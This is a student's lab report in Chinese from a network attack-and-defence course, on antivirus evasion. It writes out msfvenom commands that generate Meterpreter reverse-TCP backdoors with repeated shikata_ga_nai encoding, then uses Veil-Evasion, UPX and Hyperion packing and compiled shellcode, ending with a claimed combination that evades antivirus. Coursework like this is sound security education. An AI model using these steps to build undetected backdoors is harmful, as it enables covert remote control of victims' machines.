2018-2019-2 《网络对抗技术》Exp3免杀原理与实践 20165222

1. 实践内容

?1.1 正确使用msf编码器

使用

msfvenom?-p?windows/meterpreter/reverse_tcp?-e?x86/shikata_ga_nai?-i?7?-b?‘x00’?LHOST=

生成后门程序，其中-p设置平台及连接方式，-e设置编码方式，（可通过msfvenom -l encoders列出可用编码器）

-i设置编码次数。-b设置直到不出现后门设定的字符。

?

检测一下

?

可见直接通过修改编码器的方式行不通。

msfvenom生成如jar之类的其他文件

使用?msfvenom?-p?java/meterpreter/reverse_tcp?LHOST=

其中-p的值可由msfvenom - l payloads查看。

检查发现

同样无法通过。

veil-evasion

输入veil进入，然后根据提示生成自己想要的后门即可。

我选择了用ruby写的在meterpreter平台下的tcp反弹连接；

然后设置ip及端口

最后输出文件即可。

但同样被杀软轻而易举识别出来。

关掉杀软测试能否反弹连接，发现成功。

加壳工具

1.执行upx 20165222_backdoor.exe -o 2016.exe

?发现也被杀了出来。

?

?2.加密壳

进入/usr/share/windows-binaries/hyperion/中，执行wine hyperion.exe -v 2016.exe sxx_upxed_Hyperion.exe

?

但同样也被杀出来。

使用shellcode编程

使用?msfvenom?-p?windows/meterpreter/reverse_tcp?LHOST=

生成shellcod

然后将其写入5222.c文件，包含如下主函数：

再用i686-w64-mingw32-g++ 5222.c -o 5222.exe将其编译为exe文件

放入win10下仍能被检测出。

1.2 通过组合应用各种技术实现恶意代码免杀

?使用mesvenom，再改编码器，放入VC中执行生成可执行文件，成功连接。